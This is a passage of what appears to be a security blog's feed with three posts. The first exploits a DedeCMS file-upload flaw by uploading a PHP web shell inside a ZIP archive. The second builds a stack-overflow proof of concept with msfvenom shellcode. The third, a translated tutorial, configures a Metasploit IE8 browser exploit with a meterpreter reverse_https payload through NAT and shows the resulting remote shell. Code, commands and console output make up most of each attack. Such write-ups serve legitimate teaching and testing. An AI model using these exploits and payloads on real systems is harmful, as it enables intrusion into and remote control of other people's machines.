class="line">}</span><br></pre></td></tr></table></figure></p><p>The problem is this test:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">else if(preg_match("/\.(".$fileexp.")/i",$filename))</span><br><span class="line">{</span><br><span class="line"> $filearr[] = $truefile;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>The pattern has no end anchor, so any filename that merely contains ".jpg", ".png" or ".gif" somewhere is accepted. The caller then builds the stored name from the last four characters of the original name (substr($imgold,-4,4)), so a file named 1.jpg.php is matched as an image and copied into $cfg_image_dir with a .php extension. It is therefore enough to put a PHP file whose name contains one of those strings into the ZIP archive and upload it.</p><h2 id="利用过程"><a href="#利用过程" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>Create a ZIP archive containing a PHP file named "1.jpg.php":<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/1.png" alt=""><br>Then open dede/album_edit.php (a backend account with album permissions is needed), choose "extract files from a ZIP archive", and upload the prepared ZIP:<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/2.png" alt=""><br>Viewing the album then shows the path of the uploaded PHP file, which can be requested directly:<br><img src="/2019/02/16/dedecms v5.7 sp2文件上传漏洞/3.png" alt=""></p>]]></content>
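As an added illustration (example code written for this page, not DedeCMS code), the following Python reproduces the two pieces of logic that combine here: the unanchored extension test in GetMatchFiles() and the substr($imgold, -4, 4) suffix copy in album_edit.php, run over a constructed ZIP listing. The hardened check shows what the same test looks like once the pattern is anchored to the end of the name.

```python
import re

# The $fileexp argument that album_edit.php passes to GetMatchFiles().
ALLOWED_EXTS = "jpg|png|gif"


def dede_matches(filename):
    r"""GetMatchFiles()'s test, preg_match("/\.(jpg|png|gif)/i", $filename):
    there is no end anchor, so the extension only has to occur somewhere."""
    return re.search(r"\.(" + ALLOWED_EXTS + r")", filename, re.IGNORECASE) is not None


def dede_saved_suffix(filename):
    """album_edit.php appends substr($imgold, -4, 4) to the generated name:
    the last four characters of the extracted file's name, whatever they are."""
    return filename[-4:]


def dede_outcome(filename):
    """What happens to one ZIP entry: None if skipped, otherwise the suffix
    the copied file ends up with on disk."""
    if not dede_matches(filename):
        return None
    return dede_saved_suffix(filename)


def hardened_matches(filename):
    """Anchored check on the real (final) extension."""
    return re.search(r"\.(" + ALLOWED_EXTS + r")$", filename, re.IGNORECASE) is not None


# Constructed ZIP listing for the example.
SAMPLE_ZIP = ["photo.JPG", "1.jpg.php", "shell.php", "x.png.phtml", "readme.txt"]


def triage(names):
    """Map each name to the suffix DedeCMS would save it with (None = skipped)."""
    return {name: dede_outcome(name) for name in names}


if __name__ == "__main__":
    for name, suffix in triage(SAMPLE_ZIP).items():
        print(name, "->", suffix, "| anchored check:", hardened_matches(name))
```

Note that the suffix is not an extension at all: x.png.phtml passes the unanchored test and is stored with "html" glued to the generated name, while 1.jpg.php is stored as a .php file, which is the case the post exploits.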
<summary type="html">
<h2 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h2><p>DedeCMS (织梦内容管理系统) is one of the best-known open-source PHP content management systems in China and one of the most widely deployed. Over years of development, Dede
</summary>
<category term="web security" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="code audit" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="code audit" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="file upload" scheme="http://yoursite.com/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
</entry>
<entry>
<title>Using Metasploit in stack overflow exploitation</title>
<link href="http://yoursite.com/2019/02/13/metasploit%E5%9C%A8%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B8%AD%E7%9A%84%E8%BF%90%E7%94%A8/"/>
<id>http://yoursite.com/2019/02/13/metasploit在栈溢出中的运用/</id>
<published>2019-02-13T12:21:03.000Z</published>
<updated>2019-02-13T12:36:14.761Z</updated>
<content type="html"><![CDATA[<h2 id="示例程序"><a href="#示例程序" class="headerlink" title="Sample program"></a>Sample program</h2><p>Compile the following code, which contains a stack overflow (memcpy() copies 1000 bytes into a 12-byte buffer), in Dev-C++:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#include <string.h></span><br><span class="line">#include <stdio.h></span><br><span class="line"></span><br><span class="line">void foo(char bar[]){</span><br><span class="line">char c[12];</span><br><span class="line">memcpy(c, bar, 1000); /* deliberate overflow */</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line">FILE *fp;</span><br><span class="line">char a[1000];</span><br><span class="line">printf("input:"); </span><br><span class="line">fp = fopen("1.txt","rb");</span><br><span class="line">fread(a, 1, 1000,fp);</span><br><span class="line">fclose(fp);</span><br><span class="line">foo(a);</span><br><span class="line">return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><h2 id="控制EIP覆盖"><a href="#控制EIP覆盖" class="headerlink" title="Controlling the EIP overwrite"></a>Controlling the EIP overwrite</h2><p>Generate a cyclic pattern with Metasploit's pattern_create.rb:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msf > /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100</span><br><span class="line">[*] exec: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100</span><br><span class="line"></span><br><span class="line">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A</span><br></pre></td></tr></table></figure></p><p>Save the generated string to 1.txt and run the program under OllyDbg. When the exception occurs, EIP is 41386141:<br><img src="/2019/02/13/metasploit在栈溢出中的运用/1.png" alt=""><br><img src="/2019/02/13/metasploit在栈溢出中的运用/2.png" alt=""><br>Then use pattern_offset.rb to locate that value in the pattern:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">msf > /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41386141 -l 100</span><br><span class="line">[*] exec: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41386141 -l 100</span><br><span class="line"></span><br><span class="line">[*] Exact match at offset 24</span><br></pre></td></tr></table></figure></p><p>So the saved return address is overwritten starting at byte 24 of the input.</p><h2 id="编写poc"><a href="#编写poc" class="headerlink" title="Writing the poc"></a>Writing the poc</h2><p>From the OllyDbg session we know the saved return address sits at stack address 0062FAAC. We can therefore continue the overwrite past it, place the shellcode right after, and set the return address to 0062FAB0: when foo() executes its retn, execution is redirected to the shellcode. (This relies on the stack address being the same on every run, which holds for this test setup; with ASLR a hard-coded stack address would not be reliable.)</p><p>Generate the shellcode with msfvenom:<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">[*] exec: msfvenom -p windows/exec cmd=calc.exe -f python</span><br><span class="line"></span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x86 from the payload</span><br><span class="line">No encoder or badchars specified, outputting raw payload</span><br><span class="line">Payload size: 193 bytes</span><br><span class="line">Final size of python file: 932 bytes</span><br><span class="line">buf = ""</span><br><span class="line">buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"</span><br><span class="line">buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"</span><br><span class="line">buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"</span><br><span class="line">buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"</span><br><span class="line">buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"</span><br><span class="line">buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"</span><br><span class="line">buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"</span><br><span class="line">buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"</span><br><span class="line">buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"</span><br><span class="line">buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"</span><br><span class="line">buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"</span><br><span class="line">buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"</span><br><span class="line">buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"</span><br><span class="line">buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"</span><br><span class="line">buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br></pre></td></tr></table></figure></p><p>Then write the poc in Python (byte strings and binary mode so the file is written unchanged):<br><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">shell = b""</span><br><span class="line">shell += b"\xb0\xfa\x62\x00"  # overwrite the saved return address with 0x0062FAB0 (little-endian)</span><br><span class="line">poc = b""</span><br><span class="line">poc += b"\x41" * 24 + shell  # 24 bytes of padding up to the return address</span><br><span class="line">buf = b""  # msfvenom windows/exec cmd=calc.exe payload, placed right after the return address</span><br><span class="line">buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"</span><br><span class="line">buf += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"</span><br><span class="line">buf += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"</span><br><span class="line">buf += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"</span><br><span class="line">buf += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"</span><br><span class="line">buf += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"</span><br><span class="line">buf += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"</span><br><span class="line">buf += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"</span><br><span class="line">buf += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"</span><br><span class="line">buf += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"</span><br><span class="line">buf += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"</span><br><span class="line">buf += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"</span><br><span class="line">buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"</span><br><span class="line">buf += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"</span><br><span class="line">buf += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"</span><br><span class="line"></span><br><span class="line">poc = poc + buf</span><br><span class="line">rst = open("1.txt", "wb")</span><br><span class="line">rst.write(poc)</span><br><span class="line">rst.close()</span><br></pre></td></tr></table></figure></p><p>Run the script to generate 1.txt, then run the sample program: the calculator pops.<br><img src="/2019/02/13/metasploit在栈溢出中的运用/3.png" alt=""></p>]]></content>
<summary type="html">
<h2 id="示例程序"><a href="#示例程序" class="headerlink" title="Sample program"></a>Sample program</h2><p>Compile the following code, which contains a stack overflow, in Dev-C++<br><figure class="highlight plain"><t
</summary>
<category term="binary security" scheme="http://yoursite.com/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>Translation: Metasploit Meterpreter and NAT</title>
<link href="http://yoursite.com/2019/01/22/%E7%BF%BB%E8%AF%91-Metasploit-Meterpreter-and-NAT/"/>
<id>http://yoursite.com/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/</id>
<published>2019-01-22T05:39:58.000Z</published>
<updated>2019-01-22T06:05:26.034Z</updated>
<content type="html"><![CDATA[<h1 id="翻译:Metasploit-Meterpreter-and-NAT"><a href="#翻译:Metasploit-Meterpreter-and-NAT" class="headerlink" title="Translation: Metasploit Meterpreter and NAT"></a>Translation: Metasploit Meterpreter and NAT</h1><h2 id="引言"><a href="#引言" class="headerlink" title="Introduction"></a>Introduction</h2><p>While doing a real-world penetration test against a server, I found that Metasploit could not launch its attack properly. After some reading it turned out that the Metasploit web server cannot listen on the public IP of our router, and this article (original: <a href="https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/" target="_blank" rel="noopener">https://www.corelan.be/index.php/2014/01/04/metasploit-meterpreter-and-nat/</a>) solved the problem for me, so I translated it. The translation follows.</p><hr><p>Professional testers usually run their listeners on a host that is connected directly to the internet, with a public IP address and without any firewall or NAT device in the way. Attacking "naked" (from a host exposed on a public IP) is considered the easiest way to run a penetration test that involves reverse shells.</p><p>Not everyone can connect a host directly to the internet, and as the number of free public IP addresses keeps shrinking, the need to use an attacking machine placed on a LAN behind a router or firewall will only grow.</p><p>Placing the attacking machine behind a routing device that translates traffic from private to public creates some problems. If you launch a fairly fast port scan, you not only need to make sure the NAT device does not "choke", but because the host sits on a private network, that is, behind a router or firewall, it cannot be reached directly from the internet.</p><p>In that situation, running the attack and handling the shell that comes back can be problematic.</p><p>In this short article we will look at how to configure the Meterpreter payload correctly so that it works when the attacking machine sits behind a NAT device. We will use a browser exploit to demonstrate how to get a working Meterpreter session even when both the target and the attacker are behind NAT.</p><h2 id="网络配置"><a href="#网络配置" class="headerlink" title="Network setup"></a>Network setup</h2><p>I will use the following network setup in this post:<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/1.png" alt=""></p><p>Both the attacker and the target are behind NAT devices. We do not know the IP range used by the target; we have established that there is no direct path from the internet to the target network and that the target has no public IP bound to it.<br>We assume the target can reach the internet over ports 80 and 443.<br>In this post I use the IP 1.1.1.1 to refer to the "public" side of the attacking network. When you try the steps in this post, replace it with your own public IP.<br>I will use Kali Linux on the attacking side, with a clone of the Metasploit Git repository set up on the host:<br><figure class="highlight plain"><table><tr><td class="code"><pre>mkdir -p /pentest/exploits
cd /pentest/exploits
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install</pre></td></tr></table></figure></p><p>If you already have a git clone set up, make sure to update it to the latest version with "git pull".<br>The target runs Windows XP SP3, but that does not really matter; we will use a browser exploit to demonstrate how to use Meterpreter. I installed Internet Explorer 8 from IECollection (download: <a href="http://utilu.com/IECollection/" target="_blank" rel="noopener">http://utilu.com/IECollection/</a>). I use this IE version because it is outdated and vulnerable to most IE8 browser bugs.</p><h2 id="在攻击端设置转发"><a href="#在攻击端设置转发" class="headerlink" title="Setting up forwarding on the attacking side"></a>Setting up forwarding on the attacking side</h2><p>If we want to be able to accept connections from the target, we need to configure the firewall/NAT on the attacking side to forward traffic on certain ports.<br>The exact steps depend heavily on the brand/model/type of router or firewall you are using, so they are outside the scope of this post.<br>In general, the idea is to configure the router/firewall so that traffic arriving on ports 80 and 443 of the router's public IP address<br>is forwarded to 192.168.0.187 (the LAN IP of my attacking machine).<br>When configuring the router/firewall, be sure to check that ports 80 and 443 are actually open on it.</p><p>We will use port 80 to serve the browser exploit and port 443 for the Meterpreter reverse connection. First, we need to verify that the forwarding works.</p><p>On Kali, create a small html file and store it under /tmp:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/# cd /tmp
root@krypto1:/tmp# echo "it works" > test.html</pre></td></tr></table></figure></p><p>Next, make sure that no process is currently using port 80 or port 443:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# netstat -vantu | grep :80
root@krypto1:/tmp# netstat -vantu | grep :443</pre></td></tr></table></figure></p><p>If neither command produces any output, you can move on to the next step. If something is listed, you need to find the process using that port and stop it.<br>For port 80, you can look for the process holding the http port with lsof:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# lsof -i | grep :http
apache2 4634 root     4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4642 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4643 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4644 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4645 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)
apache2 4646 www-data 4u IPv6 393366 0t0 TCP *:http (LISTEN)</pre></td></tr></table></figure></p><p>Simply stopping apache2 frees the port:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# service apache2 stop
Stopping web server: apache2 ... waiting .
root@krypto1:/tmp#</pre></td></tr></table></figure></p><p>With the port available, we run a simple web server to serve the "test.html" page. In the folder containing test.html, run the following python command:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...</pre></td></tr></table></figure></p><p>If you now browse to <a href="http://192.168.0.187/test.html" target="_blank" rel="noopener">http://192.168.0.187/test.html</a> from Kali, you will see the "It works" page,<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/2.png" alt=""><br>and the output of the python server on Kali should list the connection and show that the page was served:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.0.187 - - [04/Jan/2014 12:42:02] "GET /test.html HTTP/1.1" 200 -</pre></td></tr></table></figure></p><p>Perfect, this verifies that the web server works. On the target, browse to <a href="http://1.1.1.1/test.html" target="_blank" rel="noopener">http://1.1.1.1/test.html</a> (again, replace 1.1.1.1 with the public IP of the router/firewall on the attacking side) and you should get the same page. If you do not see the page, check that the forwarding is set up correctly.<br>If port 80 works, go back to the attacking machine and stop the python command with CTRL+C. Then start it again, this time on port 443:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...</pre></td></tr></table></figure></p><p>Now access the web server over port 443. Although we are using port 443, which is normally associated with https (encrypted), our python handler does not use any encryption. That is, we still have to use http rather than https in the URL:<br><img src="/2019/01/22/翻译-Metasploit-Meterpreter-and-NAT/3.png" alt=""><br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /test.html HTTP/1.1" 200 -
192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -
192.168.0.187 - - [04/Jan/2014 12:47:44] code 404, message File not found
192.168.0.187 - - [04/Jan/2014 12:47:44] "GET /favicon.ico HTTP/1.1" 404 -</pre></td></tr></table></figure></p><p>(Do not worry about the 404 messages related to /favicon.ico; it is fine to ignore them.)<br>If you can connect to <a href="http://1.1.1.1:443/test.html" target="_blank" rel="noopener">http://1.1.1.1:443/test.html</a> from the target, we know that port forwarding works for both port 80 and port 443. If this does not work, there is no point in continuing, because anything else we try will fail.</p><p>Once everything works, stop the python command to free port 443.</p><h2 id="Metasploit配置"><a href="#Metasploit配置" class="headerlink" title="Metasploit configuration"></a>Metasploit configuration</h2><h4 id="浏览器漏洞利用-meterpreter-reverse-https"><a href="#浏览器漏洞利用-meterpreter-reverse-https" class="headerlink" title="Browser exploit - meterpreter/reverse_https"></a>Browser exploit - meterpreter/reverse_https</h4><p>First, we set up Metasploit to serve a browser exploit and handle the reverse https Meterpreter connection. The idea is to trick the target into connecting to the exploit on port 80 and to carry the meterpreter/reverse_https connection over port 443.</p><p>Go to the metasploit-framework folder, open msfconsole (do not forget the ./ if you want to be sure you run msfconsole from the right folder rather than the version that ships with Kali) and pick an exploit. For this demo I will use ms13_069_caret.rb:<br><figure class="highlight plain"><table><tr><td class="code"><pre>root@krypto1:/tmp# cd /pentest/exploits/metasploit-framework/
(master) root@krypto1:/pentest/exploits/metasploit-framework# ./msfconsole
 , ,
 / \
 ((__---,,,---__))
 (_) O O (_)_________
 \ _ / |\
 o_o \ M S F | \
 \ _____ | *
 ||| WW|||
 ||| |||


 =[ metasploit v4.9.0-dev [core:4.9 api:1.0]
+ -- --=[ 1248 exploits - 678 auxiliary - 199 post
+ -- --=[ 324 payloads - 32 encoders - 8 nops

msf > use exploit/windows/browser/ms13_069_caret
msf exploit(ms13_069_caret) ></pre></td></tr></table></figure></p><p>Show the options:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3</pre></td></tr></table></figure></p><p>The exploit needs a SRVHOST and a SRVPORT. Metasploit uses these two variables to determine where the web server needs to bind and listen. The idea is to trick the target into connecting to this web server via our public IP, and have the traffic forwarded to our Metasploit instance.</p><p>We cannot make the Metasploit web server listen on the public IP of our router, because it cannot "bind" itself to that IP address. If we use 0.0.0.0, the Metasploit web server will simply listen on all interfaces for incoming traffic. In other words, you can leave SRVHOST at 0.0.0.0, or set it to the LAN IP of the Kali box itself (192.168.0.187 in this case). I will leave it at the default of 0.0.0.0.</p><p>Next, we need to change the port to 80, and we will set URIPATH to / (so we know what the URI will be, instead of letting Metasploit create a random one):<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_069_caret) > set URIPATH /
URIPATH => /</pre></td></tr></table></figure></p><p>Next, we select meterpreter reverse_https as the payload. If we run "show options" again, we see:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ms13_069_caret) > show options

Module options (exploit/windows/browser/ms13_069_caret):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The local listener hostname
   LPORT     443              yes       The local listener port


Exploit target:

   Id  Name
   --  ----
   0   IE 8 on Windows XP SP3


msf exploit(ms13_069_caret) ></pre></td></tr></table></figure></p><p>The module options (SRVHOST and SRVPORT) are set the way we want them. The payload options need an LHOST and an LPORT. According to the output above, LPORT is already set to 443. This is the port the reverse Meterpreter will try to connect to. If it is not set to 443 on your Kali, simply run "set LPORT 443" so that the Meterpreter handler listens on port 443:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > set LPORT 443
LPORT => 443</pre></td></tr></table></figure></p><p>Note: in any case, to keep things as simple as possible, try to use the same port for a given "service" everywhere. That is, if you host the web server on port 80 of the firewall, make sure port 80 traffic is also forwarded to port 80 on the attacking machine/Metasploit, and serve the exploit on port 80 in Metasploit. The same goes for the payload: if we serve the payload on port 443, make sure to use that port everywhere.<br>LHOST serves two purposes:</p><ul><li>It indicates the IP address the Meterpreter shellcode must connect back to (from the target to the attacker).</li><li>It tells Metasploit where to bind when setting up the Meterpreter "handler".</li></ul><p>Because our attacking host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit runs, this IP is embedded in the shellcode, and when the initial Meterpreter shellcode runs on the target, it connects back to that IP address. The port forwarding on our router/firewall then passes the traffic on to the LAN IP of the attacking host. So we need to set LHOST to 1.1.1.1 (the public IP of your attacking machine).</p><p>Using the public IP as LHOST also means that Metasploit will try to bind itself to that IP when setting up the Meterpreter handler. Since that IP belongs to the router/firewall and not to the Metasploit instance, this obviously fails. Luckily, Metasploit automatically falls back to 0.0.0.0, essentially serving the Meterpreter handler on all local IPs of the attacking machine, while still remembering that LHOST was set to our public IP address. This is exactly what we need.</p><p>Set LHOST to 1.1.1.1:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > set LHOST 1.1.1.1
LHOST => 1.1.1.1</pre></td></tr></table></figure></p><p>If we really do not want the Meterpreter handler to fall back to 0.0.0.0, we can use one of the "advanced" options and tell it to listen on the LAN IP address:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > set ReverseListenerBindAddress 192.168.0.187
ReverseListenerBindAddress => 192.168.0.187</pre></td></tr></table></figure></p><p>Then launch the exploit:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > exploit
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://192.168.0.187:443/
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.0.187:80/
[*] Server started.</pre></td></tr></table></figure></p><p>The output tells us that:</p><ul><li>The browser exploit is hosted on <a href="http://0.0.0.0:80" target="_blank" rel="noopener">http://0.0.0.0:80</a> (or <a href="http://192.168.0.187:80" target="_blank" rel="noopener">http://192.168.0.187:80</a>). If the target connects to <a href="http://1.1.1.1" target="_blank" rel="noopener">http://1.1.1.1</a>, the traffic on port 80 is forwarded to Kali and served by the exploit.</li><li>The HTTPS reverse handler is listening on 192.168.0.187, port 443.</li></ul><p>What we do not see in the output is that the actual Meterpreter shellcode contains 1.1.1.1 as the IP address to connect back to. That value is taken from the LHOST variable.</p><p>If you are not using ReverseListenerBindAddress and get output like the following after running "exploit", check these things:</p><ul><li>Check that the port is free to use</li><li>Make sure you are running the latest version of Metasploit</li><li>Set ReverseListenerBindAddress to the local LAN IP or to 0.0.0.0</li><li>Exit msfconsole and open it again. In some cases, if you ran a session earlier, you will find that the bindings were not cleaned up in time.</li></ul><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > exploit
[*] Exploit running as background job.

[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:443).</pre></td></tr></table></figure><p>If we now use IE8 (from IECollection) on the target and connect to port 80 of the public IP of the router/firewall on the attacking side, we should see:<br><figure class="highlight plain"><table><tr><td class="code"><pre>msf exploit(ms13_069_caret) > [*] 2.2.2.2 ms13_069_caret - Sending exploit...
[*] 2.2.2.2 ms13_069_caret - Sending exploit...
[*] 2.2.2.2:53893 Request received for /NtFT...
[*] 2.2.2.2:53893 Staging connection for target /NtFT received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.0.187:443 -> 2.2.2.2:53893) at 2014-01-05 09:24:26 +0100
[*] Session ID 1 (192.168.0.187:443 -> 2.2.2.2:53893) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2952)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 500
[+] Successfully migrated to process 

msf exploit(ms13_069_caret) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 592 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\peter\Desktop></pre></td></tr></table></figure></p><p>2.2.2.2 is the public IP of the target. When the target connects to port 80, Metasploit sends the payload, exploits the browser and executes the initial meterpreter payload. That payload downloads metsrv.dll (generated by Metasploit first, so it contains the attacker's public IP and port), loads it into memory (using reflective loading) and runs the code. When that is done, you get a full Meterpreter session. Life is good.</p><p>So, in short, you should set the following variables:</p><ul><li>SRVHOST: 0.0.0.0</li><li>SRVPORT: the port you want to use for the browser exploit</li><li>LHOST: the public IP of the attacking machine</li><li>LPORT: the port the Meterpreter handler connection should come in on</li><li>ReverseListenerBindAddress: LAN IP (optional)</li></ul><p>If, for whatever reason, you also want to host the Meterpreter handler on a port other than the one the client connects to, you can use LPORT to specify where the target connects back to and ReverseListenerBindPort to indicate where the handler listens. Obviously, you then need to make sure port forwarding sends the connection to the correct port on the attacking machine.</p>]]></content>
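The forwarding test the post performs by hand (serve test.html, then fetch it through the router's public IP on ports 80 and 443) as an added Python example; this is not code from the post or from Corelan. PUBLIC_IP is the post's 1.1.1.1 placeholder and must be replaced, and local_selfcheck() serves a constructed test.html on 127.0.0.1 so the logic can be exercised without any router.

```python
# Added example: scripted version of the port-forward check described in the
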